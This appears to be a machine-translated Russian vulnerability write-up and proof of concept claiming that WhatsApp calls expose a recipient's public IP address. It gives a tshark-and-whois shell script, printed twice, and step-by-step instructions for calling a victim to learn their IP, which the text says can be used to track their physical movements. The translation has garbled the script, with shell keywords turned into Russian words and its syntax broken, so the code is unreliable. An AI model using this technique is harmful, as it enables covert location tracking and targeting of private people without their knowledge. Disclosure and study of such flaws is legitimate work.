Эта программа предназначена только для образовательных целей. Не используйте его без разрешения. Применяется обычный отказ от ответственности, особенно тот факт, что ME (Bhdresh) не несет ответственности за любые убытки, вызванные прямым или косвенным использованием информации или функциональности, предоставляемых этими программами. Автор или какой -либо интернет -провайдер не несет ответственности за содержание или неправильное использование этих программ или любых их деривативов. Используя эту программу, вы принимаете тот факт, что любой ущерб (DataLoss, System Crash, компромисс системы и т. Д.), Из -за использования этих программ, не является обязанностью Bhdresh.
Наконец, это личное развитие, пожалуйста, уважайте ее философию и не используйте ее для плохих вещей!
https://vimeo.com/577355374
Последняя версия приложения WhatsApp на всех платформах уязвима для удаленного публичного IP -раскрытия WhatsApp.
Наблюдается, что во время вызова WhatsApp (голос / видео) приложение на стороне вызывающего абонента пытается установить прямое соединение с общедоступным IP -адресом устройства получателя. Отфильтровывая IP -адреса Facebook и WhatsApp Server с местных хостов, можно раскрыть правильный общедоступный IP -адрес целевого пользователя WhatsApp без его знаний.
Ниже приведен быстрый сценарий для использования этой уязвимости,
#!/bin/sh
Filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
Echo «Нажмите Enter и позвоните своей цели».
Читать строку
tshark -i eth0 -l -t fields -f "udp" -e ip.dst -y "$ filter" -y "ip.dst! = 192.168.0.0/16 и ip.dst! = 10.0.0.0/8 и ip.dst! = 172.16.0.0/12 "| В то время как чтение строки do whois $ line> /tmp /b
Filter = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
if ["$ filter" -gt 0]; Тогда TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetinfo fi сделан
Возможность отобразить пользователей WhatsApp с их публичным IP не только раскрыт информацию о местоположении пользователей WhatsApp, но и может быть неправильно использоваться для отслеживания их физического движения, поддержав историю местоположения. Такое прямое отображение между пользователем с IP -информацией также может быть использовано для отслеживания привычек серфинга пользователей и влияния на него.
Кроме того, публичный IP может быть использован для запуска целенаправленных атак в сторону дома или офиса WhatsApp.
Пользователи: У USERA есть детали пользователя WhatsApp
Окружающая среда: n/a
Браузер: N/A.
Версия приложения: <= Последняя версия приложения WhatsApp на любой платформе
ОС: все платформы, кроме Интернета
Описание: USERA делает звонок WhatsApp для пользователя и захватывает его публичную информацию об ИС без ведома пользователя. Видео POC для лучшего понимания шагов: https://vimeo.com/577355374
Шаг 1: Запустите Wi -Fi Hotspot на машине злоумышленника и подключите телефон злоумышленника к злоумышленнику SSID
Шаг 2: запустите сценарий POC (ниже) на машине злоумышленника, которая теперь действует как маршрутизатор для атакующего телефона
#!/bin/sh
Filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
Echo «Нажмите Enter и позвоните своей цели».
Читать строку
tshark -i eth0 -l -t fields -f "udp" -e ip.dst -y "$ filter" -y "ip.dst! = 192.168.0.0/16 и ip.dst! = 10.0.0.0/8 и ip.dst! = 172.16.0.0/12 "| В то время как чтение строки do whois $ line> /tmp /b
Filter = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
if ["$ filter" -gt 0]; Тогда TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetinfo fi сделан
Шаг 3: Вызовите любого пользователя WhatsApp случайным образом, чтобы захватить IP -адреса сервера для фильтрации
Step 4: Call victim on his whatsapp
Шаг 5: Отключите вызов после установки
Шаг 6: Скрипт покажет общедоступный IP -адрес цели
Шаг 7: проверить публичный IP -адрес на целевом телефоне